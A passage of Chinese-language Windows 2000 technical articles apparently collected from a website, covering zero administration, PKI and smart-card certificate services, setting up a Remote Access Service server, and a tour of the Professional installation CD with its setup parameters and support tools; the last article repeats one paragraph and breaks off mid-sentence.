    以前，应用程序为了能够在一台指定的PC上安装，它们（应用程序）通过在本地PC的注册表存储状态和配置信息。这样做在一个网络环境中将产生问题，因为这些用户只能通过他们自己的计算机而不能在其他的位置访问他们的应用程序和工具。Win95和NT工作站使用用户漫游配置文件来实现系统环境，但是不能定位应用程序的配置信息。

    在零管理中，本地PC的状态被自动映射到服务器上。这种持久的缓存使得：数据可用性非常高，允许移动用户无论在线还是离线都可以访问信息。并且，用户可以在PC间漫游并且保持对他们数据，应用程序，自定义的环境的完整的使用。另外，如果一个用户的硬盘坏了或者PC坏了，重新恢复是非常容易的事情，而且不需要重新安装应用程序、配置用户的配置文件和其他数据。

    设计最好的解决方案　应用程序的灵活性

    互联网已经把商务应用程序分成了三类：使用数据库和后端的服务器来集中的存储数据，中间设备实现一些逻辑的和物理的角色，最后是一些瘦客户端例如浏览器来进行信息的交换。使用这个模型，复杂的逻辑和数据存储及维护能被集中在专家的监视下进行，而不用最终用户负担起配置和管理的任务，只是给他们那些需要的数据就可以了。

    零管理与三层开发模型紧密的结合在一个完整的开放平台上，允许开发者开发HTML、开放式脚本、结构组件以及后台服务。这使得可以使用集成的Microsoft Internet Explore Shell作为用户界面，并且支持通过Windows NT Server和BackOffice家族产品开发基于服务的应用程序。

    开发者和管理员开发基于网络的瘦客户端应用程序，就像是在今天的视窗上开发个人产品和客户端服务器应用程序一样灵活。当与其他零管理应用程序结合时，管理员可以精确的调整每个用户的环境来满足他们的准确需要，并且可以按照商务需要进行变化。

    虽然这里主要介绍操作系统的优点，应用程序也需要调整他们的行为来避免浪费他们的TCO。例如，程序员应该创建插件使得他们的应用程序能在MMC中进行管理，他们应该使用最新的API，等等。

    通过Active Directory Service Interfaces(ADSI)，一个应用程序可以存储用户的配置信息和应用程序自己的配置信息。这使得用户在任何时候都可以访问他们自定义的环境，而不用考虑他们自己登录的究竟是哪一台计算机。在目录中存储配置信息也使管理员更易于升级和改变资源，例如数据库服务器和打印机，而不用升级每个用户的用户配置文件或者每个用户的计算机。

    大部分零管理能力与应用程序的远程自动安装需要在一个要求锁定的（而不是可以方便修改的）环境中运行。当前的应用程序面对很少的限制，可以拷贝文件到一个用户的系统中，用户的配置信息（移动的）和计算机的配置信息（固定的）也被混在了一起。微软一直致力于为Independent Software Vendors(ISVs)设置一个清晰的开发应用程序的指导方针。在零管理中，应用程序的安装变成了一个操作系统的服务。每个应用程序必须创建一个用于安装的软件包来进行安装的服务。幸运的是，创建这样一个软件包很容易，甚至不需要编程，只要使用Windows Software Development Kit(SDK)中的一个工具就可以了。

    总结

    微软的零管理策略使得在一个组织中可以最大限度的减少由于软件的原因而出错的机会，同时由于普通用户的管理工作非常少，组织的培训费用将大大降低。因此，充分利用Windows 2000的这种能力，将使得组织的效率更高，而总拥有成本将会更低。

返回


Windows 2000公钥基础结构及在电子商务中应用

《一键清理系统垃圾》

Windows 2000公钥基础结构及在电子商务中应用

1 概述
    Windwos 2000为电子商务提供了一个理想的平台， 其安全性（包括证书管理、 CA服务、 公用密钥基本体系）， 保证了电子商务的开展。 结合Windows 2000的IIS 5.0服务， 可以快速创建一个网上电子商务的平台。

Windows 2000中有两种验证协议， 即Kerberos和公钥基础结构（Public Key Infrastructure， PKI）， 这两者的不同之处在于： Kerberos是对称密钥， 而PKI是非对称密钥。在Internet环境中， 需要使用非对称密钥加密。 即每个参与者都有一对密钥， 可以分别指定为公钥(PK)和私钥(SK)， 一个密钥加密的消息只有另一个密钥才能解密， 而从一个密钥推断不出另一个密钥。 公钥可以用来加密和验证签名； 私钥可以用来解密和数字签名。 每个人都可以公开自己的公钥， 以供他人向自己传输信息时加密之用。 只有拥有私钥的本人才能解密， 保证了传输过程中的保密性。 关键是需要每个人保管好自己的私钥。同时， 为了保证信息的完整性， 还可以采用数字签名的方法。 接下来的问题是， 如何获得通讯对方的公钥并且相信此公钥是由某个身份确定的人拥有的， 这就要用到电子证书。 电子证书是由大家共同信任的第三方--认证中心（Certificate Authority， CA）颁发的， 证书包含某人的身份信息、 公钥和CA的数字签名。 任何一个信任CA的通讯一方， 都可以通过验证对方电子证书上的CA数字签名来建立起和对方的信任， 并且获得对方的公钥以备使用。

Windows 2000的PKI是基于X.509协议的，X.509标准用于在大型计算机网络提供目录服务，X.509提供了一种用于认证X.509服务的PKI结构，两者都属于ISO和ITU提出的X系列国际标准，目前，有许多公司发展了基于X.509的产品，例如Visa、MasterCard 、Netscape，而且基于该标准的Internet和Intranet产品越来越多。X.509是目前唯一的已经实施的PKI系统。X.509 V3是目前的最新版本，在原有版本的基础上扩充了许多功能，目前电子商务的安全电子交易（SET）协议也采用基于X.509 V3。

2 Windows 2000的公钥基础结构
如何在数字化通信中建立起信任关系， 是电子商务发展的重中之重。 因此， 建立认证中心(CA)是关键的一步。 Windows 2000可以作为建立CA的技术方案， 其内置了一整套颁发证书和管理证书的基础功能。 Windows 2000 Server中有一个部件是证书服务器（Certificate Server）， 是原来Windows NT 4.0的选项包中Certificate Server 1.0的升级产品。
通过认证服务器， 企业可以为用户颁发各种电子证书， 比如用于网上购物的安全通道协议(SSL)使用的证书， 用于加密本地文件(EFS)的证书等等。 认证服务器还管理证书的失效， 发布失效证书列表等。 每个用户或计算机都有自己的一个证书管理器， 其中既放置着自己从CA申请获得的证书， 也有自己所信任的CA的根证书。

Windows 2000中的电子证书都是基于X.509协议的， 保证了与其他系统的互操作性。 国际标准组织CCITT建议以X.509作为X.500目录检索的一个组成部分， 提供安全目录检索服务。 X.500是CCITT建议的， 用于分布网络中存储用户信息的数据库的目录检索服务的协议标准。 X.509是采用公钥基础结构实施的认证协议， 对通信双方按所用密码体制规定了几种认证识别方法， 它发表于1988年， 经多次修改， 1993年又公布了新的版本。 X.509对所用具体加密、 数字签名、 公用密钥以及Hash算法未作限制， 将会有广泛的应用，已纳入PEM(Privacy Enhanced Mail)系统中。

就网上购物的过程来说， 目前常用的是SSL（安全通道协议）的方式， 即设置IIS就某些特定的文件或文件目录需要访问者提供客户端证书； 除非拥有电子证书及相应的私钥， 一个访问者的浏览器无法获得这些文件和文件目录。 SSL的方式体现在浏览器的访问栏上， 应该是Https而不是普通的Http。 通过网站验证后的访问者， 可以被映射为活动目录中的用户或者用户组， 实现合作伙伴之间外部网（Extranet）的应用。

为了安全地保管私钥和电子证书， 在Windows 2000中， 微软为用户还提供了一套智能卡的结构。 智能卡因其高安全性和轻便的可移动性， 势必将发展成为类似鼠标/键盘一般的计算机的标准外设。 微软还提供了一套基于32位Windows平台的Smart Card for Windows产品， 包括API和开发工具。 众多的智能卡厂家， 如Gemplus， 只要生产符合国际ISO工业标准的智能卡产品， 就可以在微软的Smart Card软件平台上操作。

当用户用Internet Explorer向一个认证中心申请电子证书时， 就会有一对公钥和私钥自动产生出来； 私钥可以存储在智能卡中， 公钥和其他身份信息（比如姓名、电子邮件地址等）发给认证中心。 如果认证中心批准该申请， 那么包含公钥的电子证书就会被返回来， 存储在智能卡中。 这种电子证书的申请过程也可以由管理员设定的批处理方法来进行， 用户还可以通过LDAP来查询CA中通讯对方的公钥， 因为Windows 2000的认证服务器是可以与活动目录相结合的， 所以这方面的查询很方便。

智能卡存储私钥和电子证书的做法， 给最终用户提供了对自己安全信息的最大的控制， 可以方便地从一台机器携带到另一台机器使用； 可以在任何一个地点使用。 一般来说， 智能卡还会用一个个人密码(PIN)保护起来， 在要求高安全性的场合， PIN可以是一些生物信息， 比如指纹等。 智能卡中存储的信息是加密的， 即使破坏了智能卡也得不到里面的内容。 智能卡的阅读器也越来越普遍， 有USB型的， 也有PC卡型的， 甚至Windows终端上也会有智能卡插槽。 智能卡正在逐渐走向大众化。

如果企业实施了基于Windows 2000的智能卡体制， 由企业保安机构给每个员工颁发一个智能卡。 员工就可以用这个卡完成很多的工作， 比如打开公司的大门， 打开自己的抽屉， 登录到计算机和网络； 加密自己的邮件和文件， 这样即使管理员有完全控制的权限， 管理员也不能获知其中的内容； 员工还可以上网购物， 比如购买一张机票， 然后直接到飞机舱前划卡即可上飞机； 还可以作为电话卡、 信用卡使用； 作为市政交费卡使用， 支付水、电、煤气等费用； 作为电子钱包式的储值卡来使用， 支付小额的午餐费、 出租车费等等。 可以说智能卡的应用在Windows 2000推出之后， 会有一个长足的进步。

"公用密钥基本体系"通常简称为PKI（Public Key Infrastructure）， 是一个数字认证、 证书授权和其他注册授权系统。 使用公用密钥密码检验及检证电子商务中所涉及的每个机构的有效性。 公用密钥基本体系的标准仍处于发展阶段， 尽管它们作为电子商务的一个必要组成部分已得到广泛使用。 图1是Windows 2000 的公钥基础结构， 其核心是加密服务、 证书管理服务， 为应用程序的开发提供了加密API接口（CryptoAPI）。 Windows 2000 的公钥基础结构具有以下特点：

（１） 牢靠的安全性。 Windows 2000的公钥基础结构包括采用智能卡的牢靠验证， 保持公用网的保密性， 以及确保传输数据的完整性。 此外， 管理员可使用 Windows 2000 安全权限指派用户证书的使用。 
（２） 简易管理。 Windows 2000的公用密钥与活动目录和组策略的集成， 可以对管理企业内部的委托关系进行调整， 还提供将证书直接或经 Internet Information Services 映射到活动目录中用户帐户的能力。 
（３） 新机遇。 可以安全地交换诸如Internet等公用网上的文件和数据， 具有实现安全 E_mail(S/MIME)的能力。此外， 作为电子商务的一个重要组成部分， 可以利用电子签名建立发送者的无法否认机制。 

图1 Windows 2000 的公钥基础结构

3 Windows 2000 公钥基础结构的证书服务
证书基本上是一个由权威发布的电子声明， 其作用在于担保证书持有者的身份。 证书将公用密码与持有相应私有密钥的个人、 机器或服务的身份绑定在一起。 证书由各种公用密钥安全服务和应用程序提供， 为非安全网（如 Internet ）提供数据验证、 数据完整性和安全通讯。 
Windows 2000 基于证书的过程所使用的标准证书格式是 X.509 V3， X.509证书包括有关证书拥有的个人或实体的信息及证书颁发机构的可选信息。 实体信息包括实体名称、 公用密钥、 公用密钥运算法和可选的唯一主体 ID。 版本 3 证书的标准制定了以下规定： 密钥标识符、 密钥用法、 证书策略、 替换名称和属性、 证书路径约束以及对证书撤消原因和列表分区。 
Windows 2000 Server 证书服务是 Windows 2000 中的组件， 证书服务用于创建和管理证书颁发机构(CA)。 证书颁发机构负责建立和担保证书持有者的身份。 证书颁发机构还会在证书失效时， 将其撤消并发布证书撤消列表， 供证书检验机构使用。 最简单的公用密钥基本体系只有一个证书颁发机构。 事实上， 大多数配置公用密钥基本体系的组织使用多个证书颁发机构， 并将其有组织地形成证书分层结构。
Windows 2000的证书服务按证书颁发机构类型分为：
（1）企业根CA,是企业中最受信任的证书颁发机构，应该在网络上的其它证书颁发机构之前安装，需要 Active Directory.
(2) 企业从属CA，是标准证书颁发机构可以给企业中的任何用户或机器颁发证书，必须从企业中的另一个证书颁发机构获取证书颁发机构证书，需要 Active Directory.
(3) 独立根CA，是证书颁发机构体系中最受信任的证书颁发机构，不需要 Active Directory.
(4)独立从属CA，是标准的证书颁发机构可以给任何用户或机器颁发证书；必须从另一个证书颁发机构获取证书颁发机构证书，不需要 Active Directory。

证书服务的一个单独组件是证书颁发机构的Web注册页。 这些网页是在安装证书颁发机构时默认安装的， 它允许证书请求者使用Web浏览器提出证书请求。 此外， 证书颁发机构网页可以安装在未安装证书颁发机构的 Windows 2000 服务器上， 在这种情况下， 网页用于向不希望直接访问证书颁发机构的用户服务。 如果选择为组织创建定制网页访问 CA， 则 Windows 2000 提供的网页可作为示例。 
4 智能卡
智能卡是防止篡改的简便方法，它可以向诸如客户身份验证、登录到 Windows 2000 域、代码签名和保护电子邮件之类的任务提供安全性解决方案。通过智能卡登录到网络提供了很强的身份验证方式，因为，在验证进入域的用户时，这种方式使用了基于加密的身份验证和所有权证据。例如，如果某个不怀好意的人得到了用户的密码，就可以用该密码在网络上冒称用户的身份。很多人都选择容易记忆的密码，这会使密码先天脆弱，易受攻击。
在使用智能卡的情况下，那个不怀好意的人将必须获得用户的智能卡和个人识别码 (PIN) 才能假扮用户。因为需要有另一层信息才能假扮用户，所以该组合明显不易遭受攻击。另一个优点是，连续发生几次不成功的 PIN 输入后，智能卡会被锁定，使得对智能卡进行词典攻击非常困难。（注意 PIN 不必是一列数字，它也可以使用其他字母数字字符。）
对加密智能卡的支持是 Microsoft 集成到 Windows 2000 中的公钥基础结构 (PKI) 的关键功能。智能卡提供以下功能：
（1）保护私钥和其他形式个人信息的防篡改存储区。
（2）将安全性关键计算隔绝起来包含从不必"必须知道"的其它组织部门进行的身份验证、数字签名和密钥交换。
(3) 在单位、家庭或路上的不同计算机之间发凭据及其他私人信息的可携带性

返回


Windows 2000构建的远程访问服务

《一键清理系统垃圾》

Windows 2000构建的远程访问服务

公司的规模越来越大，各地分公司和出差在外地的员工都要与公司总部随时交换机密的商务信息。如何在你的局域网上实现一个安全、方便、低成本的远程访问服务？如果你的网络是基于NT的，那么采用Windows 2000 Server将是你的最佳选择。

远程访问的连接方式

什么是“远程访问服务”？举个例子：你通过电话线拨号到ISP，那就是远程访问，而你的ISP即为你提供了远程访问服务。可见，所谓的远程访问是指，客户端利用WAN技术，通过某种远程连接方式（如Modem+电话线）登录到本地网络中。至于“远程”也未必千里之外，可能就在隔壁。显然，远程访问服务（Remote Access Service，RAS）就是允许计算机通过某种远程连接来访问本地的网络资源，为那些没有条件与本地网络直接相连的用户提供接入服务。

微软在Windows 2000 Server 内提供的远程网络服务，较之以前版本有不少新特点：首先，远程访问服务可以和Windows 2000 Active Directory集成在一起，作为Windows 2000 域的一部分。其次，提供更可靠的安全控制（如：MS-CHAP V2、可扩展的身份验证协议、RADIUS 客户、账户锁定等），更方便的管理手段（如：路由和远程访问管理、带宽分配协议、远程访问策略），更多种的远程服务协议（如：支持第二层隧道协议、支持 AppleTalk Macintosh客户机远程访问 、转发IP多播通讯）。

Windows 2000采用的远程访问方式，是远程客户方式（与之对应的是远程控制方式），在此方式下需要在服务器上安装远程服务软件，或者专门设立一个远程访问服务器。远程客户机与在本地的客户机的操作相比，只是接入方式不同而已，客户使用标准工具（如：Windows 资源管理器）访问资源。 Windows 2000的远程访问服务器，是作为“路由和远程访问”服务的一部分，可以提供两种不同的远程访问连接方式。

1. 拨号网络连接

我们常见的通过电话线+Modem方式就是这种连接方式。此方式下，远程客户机使用非永久的物理连接到远程访问服务器的物理端口上。一旦建立连接后，拨号网络客户机和拨号网络服务器之间就有了直接的物理连接。

2. 虚拟专用网络连接

虚拟专用网络（VPN）是远程客户机使用基于 TCP/IP协议 的专门的隧道协议（如PPTP、L2TP），通过虚拟专用网络服务器的虚拟端口，穿越其他网络（如Internet），实现一种逻辑上的直接连接。我们常见的虚拟连接的例子是，异地员工通过拨号网络连接到当地的ISP，经由Internet连入公司的远程访问服务器，此服务器应答客户机的虚拟呼叫，在客户机和公司内部的局域网之间传递数据，就像在Internet上打了个隧道。

Windows 2000的远程访问组成

Windows 2000的远程访问网络，一般包括以下几部分：

1.远程访问服务器

Windows 2000 Server 远程访问服务器就是一台激活了路由和远程访问服务的计算机，提供远程客户访问整个网络的共享资源，或者限制只能到远程访问服务器的资源上访问。服务器必须有至少一个调制解调器或一个多端口适配器、模拟电话线或其他 ＷＡＮ 连接。如果服务器提供对网络的访问，还必须安装网卡，并连入服务器提供访问的网络上。对经Ｉｎｔｅｒｎｅｔ访问虚拟专用网络，一般服务器应有到Ｉｎｔｅｒｎｅｔ的永久性连接（如果ＩＳＰ支持Ｄｅｍａｎｄ－Ｄｉａｌ连接，也可以是非永久连接）。

2.远程访问客户

连接到运行Windows 2000的远程访问服务器上的拨号网络客户机可以是Windows NT/ 2000、Windows 9x、MS-DOS以及任何微软的PPP客户机，也可以是使用TCP/IP、IPX、NetBEUI或AppleTalk的非 Microsoft PPP客户机。客户机必须安装有调制解调器、模拟电话线或其他 WAN 连接、远程访问软件，远程客户不需要网卡。

3.远程访问协议

远程访问协议是在WAN上传输信息的规范。NT还支持PPP、SLIP（Serial Line Internet Protocol串行线路网际协议）和Microsoft RAS（NetBEUI）等远程访问协议。

4.LAN协议

Windows 2000 远程访问支持TCP/IP、IPX、AppleTalk和NetBEUI局域网协议访问Internet/UNIX、NetWare服务器和Apple Macintosh。

5.隧道协议

隧道协议是用来创建VPN客户机到 VPN 服务器上的安全连接。Windows 2000 远程服务器支持PPTP 和 L2TP两种隧道协议。

6.广域网

Windows NT RAS允许远程客户由调制解调器或者Modem池（Modem Pool）通过标准的电话线拨入网络，也支持远程客户用ISDN、X.25、ATM实现较快的广域网连接，或者串行端口连接（RS-232C Null Modem）、并行端口连接、红外连接等直接连接。

7.Internet访问支持

Windows 2000 远程访问服务器可以提供远程客户接入Internet服务，如同你的ISP。

8.安全性规则

Windows 2000 具有登录和域的安全性检查、安全主机支持、数据加密、远程身份验证拨入用户服务 (RADIUS)、智能卡、回叫复查、账户锁定等安全措施，为远程客户提供安全的网络访问，使得远程访问甚至比本地访问更安全。

Windows 2000 远程访问全部的特色和可能的配置如图1所示。

图1 Windows 2000远程访问服务组成

安装远程访问服务器

安装 Windows 2000 服务器时，“路由和远程访问服务”组件已经自动安装，但是该服务处于非激活状态，需要手工启用和配置。下面以服务器用调制解调器拨号连接方式为例，具体介绍远程访问服务的安装与设置，其他方式的远程接入设备的安装请参阅相关资料。

步骤1：

安装调制解调器。首先确保调制解调器正确连接到电话线和计算机上。一般符合即插即用的调制解调器均能被Windows 2000检测到并自动安装。如果你的调制解调器不能自动安装，请使用“控制面板”中的“电话和调制解调器选项”的“调制解调器”标签手动安装调制解调器。

步骤2：

经由“管理工具”→“路由和远程访问”，屏幕将出现“路由和远程访问”窗口。选中该窗口左边“树”中的“本地”，然后选“操作”选单中的“配置并启用路由和远程访问”项，屏幕出现“路由和远程访问服务安装向导”欢迎窗口，单击“下一步”按钮。

图2 用户远程访问授权

步骤3：

根据向导选择“远程访问服务器”，单击“下一步”按钮，选择现有的或者添加一个远程客户协议（如：TCP/IP），按“下一步”。

步骤4：

如果你在步骤3选择TCP/IP协议，向导将会要求你指出如何对远程客户分配IP地址，选择“来自一个指定的地址范围”，你也可以选择“自动”让DHCP服务器或者远程访问服务器为你自动生成，按“下一步”。

步骤5：

如在上一步选择了指定远程客户的IP地址，你将在这步通过“新建”按钮，设置远程客户静态的IP地址（如：起始IP地址：192.168.181.2，结束IP地址：192.168.181.6）后，单击“下一步”按钮。

步骤6：

选择不使用RADIUS，单击“下一步”按钮，最后按“完成”按钮，至此，激活了路由和远程访问服务。

现有的网络用户，需要经远程访问授权后，才可以在远地访问远程访问服务器及网络。方法是，通过管理工具“Active Directory用户和计算机”(如远程访问服务器是独立服务器用“计算机管理”)，选择用户后右击鼠标，选浮动选单的“属性”项，打开“拨入”标签，如图2所示。可以设置远程访问权限、回拨属性等。

远程访问服务器的管理

远程访问服务器启用后，日常的管理还是较方便的，主要在“管理工具”→“路由和远程访问”窗口进行，如图3所示。下面就具体介绍远程访问服务器几种日常管理方法。

1.重新配置远程访问服务器

从“树”中选择要设置的远程访问服务器，右击鼠标选择浮动选单的“属性”项。将会出现远程访问服务器属性对话框，在此你可以重新设置远程访问服务器验证的安全策略、远程客户IP地址分配方式、PPP的属性和事件日志的策略。

2.使用远程访问策略

“远程访问策略”是Windows 2000新引入的安全机制，不仅Windows 2000 路由远程访问服务器，用它来决定接受或拒绝连接尝试，Windows 2000 Internet 验证服务器 (IAS)也使用远程访问策略。远程访问策略设置的具体方法和步骤，在线帮助十分详细（有具体方案），不再赘述。顺便说一下，Windows 2000“远程访问策略”，对于网络管理员来说绝对是一个好东西，值得好好研究。

3.对已拨入的远程客户的管理

对于已经拨入RAS服务的远程客户和客户机，可以通过图2所示窗口中，选择“远程访问客户端”，然后在窗口左边的详细窗格选中用户。右击鼠标，可以察看用户的状态、强制断开用户的连接、向远程用户发送消息等。

图3 “路由和远程访问”窗口

如果你通过电话线实现远程连接，只要利用Windows 95/98安装好调制解调器和拨号网络程序，就可实现与远程访问服务器的连接，与你拨入ISP的方法没有什么区别。不过需要注意“拨号网络/属性”中“服务器类型”标签的配置要和服务器端一致。连入远程访问服务器后，你就可以使用标准工具（如：网络邻居）访问资源，除了速度慢些外和在局域网上没有任何区别。

在安全方面的几点建议

在局域网上提供远程访问服务后，对局域网的安全管理来说是一个不小的挑战。下面把在远程访问服务器安全管理工作中需要注意的几个方面列出，供大家参考。

1. 不允许除Win 2000的远程访问服务器以外的机器应答远程访问请求，整个网络最好只有一处提供远程访问服务。

2. 设专门的远程访问服务器，并将该服务器置于中心机房。

3. 使用远程访问策略，控制远程访问客户的拨入时间。对于偶尔使用远程访问可以采用人工控制远程服务器的启动和停止。

4. 对固定的用户最好采取回叫的方式实现远程连接，当然这要增加你的电话费，但这是远程访问最重要的安全策略。

5. 通过远程访问服务器的IP地址分配，限制远程用户的IP地址，进而利用防火墙控制和隔离远程访问客户。

6. 对于远程访问的口令采取某种加密鉴别（如：MS-CHAP），以保证用户口令在远程线路上安全传送。

随着Internet的普及，通过电话线直接连接RAS的方式有被VPN替代的趋势，但是VPN一般需要在Internet上有固定的IP地址，这是绝大多数中小公司所不具备的。而在实际工作中要求提供远程访问服务的需求众多，所以利用传统的“调制解调器+电话线+RAS”实现远程连接还是有广泛的用途的。

返回


Windows 2000光盘探秘

《一键清理系统垃圾》

Windows 2000光盘探秘

随着Windows 2000中文版的正式上市，相信不少用户已在自己的电脑上安装了这个微软用于统
一Windows 9x和NT的新操作系统，以体验其强大的稳定性、安全性、可扩展性和多功能性。W
indows 2000共有4个针对不同应用领域的版本，分别为Windows 2000 Professional、Window
s 2000 Server、Windows 2000 Advanced Server和Windows 2000 DataCenter Server。由于
大部分用户使用的是Professional版本，所以笔者就此对Windows 2000 Professional中文正
式版（版本号为2195）的安装光盘（以下简称为安装光盘）中的内容做一番剖析。对于RC2、
RC1及各Beta版的用户，可能会略有差异，但大部分内容还是相同的。

--------------------------------------------------------------------------------

随着Windows 2000中文版的正式上市，相信不少用户已在自己的电脑上安装了这个微软用
于统一Windows 9x和NT的新操作系统，以体验其强大的稳定性、安全性、可扩展性和多功能性
。Windows 2000共有4个针对不同应用领域的版本，分别为Windows 2000 Professional、Win
dows 2000 Server、Windows 2000 Advanced Server和Windows 2000 DataCenter Server。由
于大部分用户使用的是Professional版本，所以笔者就此对Windows 2000 Professional中文
正式版（版本号为2195）的安装光盘（以下简称为安装光盘）中的内容做一番剖析。对于RC2
、RC1及各Beta版的用户，可能会略有差异，但大部分内容还是相同的。

    安装光盘的根目录下共有7个文件和6个目录。

    下面先介绍这7个文件及其作用：
1．Autorun.inf：自运行文件，使安装光盘在插入后自动运行安装程序引导用户进行安装
。
2．Bootfont.bin：控制安装启动时的中文字体。
3．Cdrom_ip.5：用于在安装时认证这张光盘为合法正版的Windows 2000 Professional安
装光盘。对于Server和Advanced Server其相应的文件分别为Cdrom-is.5和Cdrom-ia.5。
4．Cdrom-nt.5：也用于认证该光盘为合法正版的Windows 2000安装光盘。对于上述3个版
本的Windows 2000，这个文件是相同的。
5．Read1st.txtL：版本发布说明文件，含有一些重要安装信息。
6．Readme.doc：Word文档，内有关于Windows 2000兼容性和安装后的注意事项，建议大
家看一下。
7．Setup.exe：用于Windows9x、Windows NT下的安装文件，相当于I386目录下的Winnt3
2.exe文件。

    根目录下共有BOOTDISK、DISCOVER、I386、SETUPTXT、SUPPORT、valueADD 6个目录。下
面介绍其中的主要内容作。

一．BOOTDISK目录
    此目录中Makeboot.exe和Makebt32.exe文件用于制作Windows 2000的启动盘，共需4张软
盘。前者可在DOS、Windows9x、Windows NT和Windows 2000下运行，而后者只能在纯32位的W
indows NT和Windows 2000中运行。4个.img文件为制作启动盘文件所需文件。

二．DISCOVER目录
    双击此目录中的Default.htm文件，可用浏览器打开“Windows2000 Professional探索”
，内有一些关于Professional中文版功能特点的简要说明，有兴趣的朋友可以看一下。

三．I386目录
    这个目录中包含了几乎所有用于安装Windows 2000的源文件，大小有320M之多。其中Win
nt.exe和Winnt32.exe为安装执行文件。前者用于在DOS下进行全新安装，后者用于在Windows
9x、NT下进行全新或升级安装。需提醒大家一句，安装前一定要加载Smartdrv，不然光复制文
件就可能要好几个小时。这两个执行文件都可带一些参数设置，下面就选一些常用的向大家介
绍一下。

    Winnt.exe的参数

1．/r：<指定目录名>
    此参数可在安装时一起安装用户所指定目录（要包含在I386目录下）中的内容，如一些较
旧的硬件设备可能不被Windows 2000自带的驱动程序所支持，那么我们可将其驱动程序所在的
目录在安装时一并装入Winnt目录下。

2．/rx：<指定目录名>
    此参数与上述参数功能相同，只是在安装后将这个用户指定的目录删除。

3．/s：<路径名>
    默认情况下，安装程序在安装时会调用位于当前目录（即光盘I386目录）中的众多安装源
文件。我们可先将I386目录全部复制到硬盘上，再用此命令参数如Winnt /s:c:＼i386进行定
位，以加快安装速度。

4．/t：<分区名>
    默认情况下，安装程序用C盘作为安装时临时文件的存放空间，并在其上安装 Windows 2
000。我们可用此命令参数进行更改，如Winnt /t:d: 。

5．/u：<应答文件名>
    此参数可结合应答文件来实现无人看守的全自动安装。具体方法将在后文中介绍。
Winnt32.exe的参数

    此命令的许多参数都与Winnt.exe命令的参数功能相同。如/copydir：对应/r：、/copys
ource：对应/rx：、/s：对应/s：、/tempdrive：对应/t：、/unattend：对应/u：，其他用
得不多的参数就不再一一介绍了。

四．SETUPTXT目录
    此目录包含2个文本文件，用于指导用户安装。

五．SUPPORT目录
    此目录中的Hcl.txt文件中包含了所有已通过与Windows 2000兼容测试的硬件产品的列表
，有近14000种。当然，并不是说不在此列表中的硬件设备就一定会与Windows 2000发生冲突
，用户可到微软的网站查询最新的兼容硬件列表文件。

    Windows 2000 的实用支持工具

    此目录中还有一个Tools子目录。成功安装Windows 2000后，在Windows2000系统中执行T
ools目录中Setup文件，可安装一组Windows 2000的支持工具。另外要说明的是，Tool目录中
所带的支持工具共有49个，若我们使用默认安装只是安装了其中的12个。若是要使用其它的支
持工具，可先在支持工具帮助文件中查看运行某一工具所需的文件，然后将相应的文件从Too
l目录下的Support压缩包中解压出来。

    安装完后，可在“开始菜单”→“程序”→“Windows 2000 Support Tools”→“Tools
”中找到所安装的工具。由于此套未经多语言标准化，所以即使是在中文版的Windows 2000中
，此套工具中的大部分程序也都是英文的，这不能不说是一个小小的遗憾。考虑到篇幅及对一
般用户的实用性，笔者选其中的几个向大家简要介绍一下。

    1. Application Compatibility Tool（以下简称ACT）由于Windows 2000是一个新开发出
的操作系统，所以目前有许多应用程序还不能在Windows 2000上安装或运行。这个工具就是用
于在Windows 2000上模拟其它的操作系统（Windows 9x、NT4）,从而骗过一些原本不能在Win
dows 2000上安装或运行的程序，使其得以顺利安装或运行。ACT的使用十分简单，运行后点击
界面中的“Browse”按钮来选择想要安装或运行的程序，然后在“Operating System”栏中选
择想要模拟的操作系统后，点击“OK”按钮，如果顺利的话即可安装或运行了。如果程序还是
不能安装或运行，那就再尝试选中界面下方“Disable Heap Manager on Windows 2000”（用
于防止程序与Windows 2000的内存管理模式间的冲突）、“Use pre-Windows 2000 Temp Pat
h”（用于禁用Windows 2000的临时目录）和“Correct disk space detection for 2-GB+ d
rives”（用于避免程序对Windows 2000磁盘空间的检测冲突）这三项中的一项或多项。如果
程序与Windows 2000的不兼容性得以解决，我们还可选中“Make the above check box sett
ings permanent”将解决方案写入注册表，以后就可不用先运行ACT而直接顺利运行原本与Wi
ndows 2000不兼容的程序。当然，ACT并不是万能的，也只是对部分不兼容程序有效。如果某
程序实在无法在Windows 2000安装或运行，那只有等待其支持Windows 2000的升级文件或补丁
了。

    2.Process Viewer这个工具用于查看本机或其他已互连的机器当前所有正在运行的进程和
程序。运行Process Viewer后，默认显示的为本机的进程情况。我们也可在“Computer”栏中
输入机名地址路径后，按“Connect”按钮来查看其它已互连的机器。界面左方的“Memory D
etail”按钮分别用于对选中的进程或程序进行内存详细使用情况的查看；“Kill Process”
按钮可将其终止。按“Refresh”按钮可进行刷新。此外，界面中还显示出了选中进程的有效
处理时间、内存使用的优先级别、所使用的线程数及其优先级等内容，可供用户查看参考。

    3.WinDiff使用这个工具可对2个文件或2个文件夹中的文件进行ASCII码形式的比较，从而
找出两者间的不同之处，并以显而易见方式标示出来。这一工具对于经常编一些程序、手写h
tml文件、文本处理的用户来说是十分有用的。运行WinDiff后，选择“File”菜单中的“Com
pare Files”（或“Compare Directories”）命令，在弹出的对话框中分别选择两个需要比
较文件（或目录）后，即可在WinDiff的主界面中看到比较结果，相同的用黑色显示，不同的
用红色显示。选中比较结果后，点击界面右上方的“Expand”按钮即可察看更为详细的比较结
果。对于两个文件的不同之处，第一个文件用红底标出，第二个文件用黄底标出，并在左方标
有相应的行号。我们还可以实现更改显示方式、查找、保存不同之处或是相同之处等许多功能
，这里就不再一一介绍了。

其它一些支持工具如活动目录管理工具、活动目录复本监视器、SNMP查询工具等对于注重
网络应用的用户都有一定的实用价值。

    无人看守的全自动安装

    Tool目录下还有一个名为Deploy的CAB压缩文件，将其解压到一个临时目录后，其中的se
tupmgr可用于制作进行无人看守全自动安装时的应答文件。我们知道，若以一般的方式进行安
装，在安装过程中安装程序会多次要求用户来输入一些设置信息，所以我们必须看守在机器旁
直到整个安装过程结束。其实，用户可以事先将安装过程中所要回答的信息设置好，将其制成
一个文件，这个文件就称为应答文件。安装程序可调用应答文件，以实现无人看守的全自动安
装。

    运行Setupmgr即可进入“Windows 2000 安装管理器向导”开始制作应答文件。点击“下
一步”后，选择“创建新的应答文件”。若用户需要创建可复制本机配置的应答文件或修改已
有的应答文件，则可选择相应的项。点击“下一步”后，选择应答文件用于“Windows 2000
的无人参与安装”。点击“下一步”，选择安装平台为“Windows 2000 Professional”。点
击“下一步”，注意这一步是关键，一定要将安装时的交互等级设为“全部自动”。在接受M
icrosoft许可协议后，制作向导便正式开始要求用户填写或设置诸如名称、单位、计算机名、
